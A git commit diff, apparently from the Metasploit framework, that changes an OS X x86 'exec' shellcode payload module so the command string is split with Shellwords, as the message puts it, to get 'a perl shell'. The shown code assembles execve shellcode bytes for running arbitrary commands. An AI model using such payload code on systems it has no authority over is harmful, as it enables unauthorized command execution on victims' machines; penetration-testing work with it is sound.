Shellwords! Now you can use exec to get you a perl shell

jvennix-r7 · jvennix-r7 · commit 766a8d58173c · 2013-07-17T21:16:04.000-05:00
diff --git a/modules/payloads/singles/osx/x86/exec.rb b/modules/payloads/singles/osx/x86/exec.rb
@@ -48,7 +48,7 @@ def initialize(info = {})
 	def generate_stage
 		cmd_str   = datastore['CMD'] || ''
 		# Split the cmd string into arg chunks
-		cmd_parts = cmd_str.split(/[\s]+/)
+		cmd_parts = Shellwords.shellsplit(cmd_str)
 		# the non-exe-path parts of the chunks need to be reversed for execve
 		cmd_parts = ([cmd_parts.first] + (cmd_parts[1..-1] || []).reverse).compact
 		arg_str = cmd_parts.map { |a| "#{a}\x00" }.join
@@ -61,7 +61,7 @@ def generate_stage
 
 		# now EBX contains &cmd_parts[0], the exe path
 		if cmd_parts.length > 1
-			# Build an array of pointers to the arguments we copied on to the stack
+			# Build an array of pointers to arguments
 			payload += "\x89\xD9" +                   # mov ecx, ebx
 			           "\x50" +                       # push eax; null byte (end of array)
 			           "\x89\xe2"                     # mov edx, esp (EDX points to the end-of-array null byte)
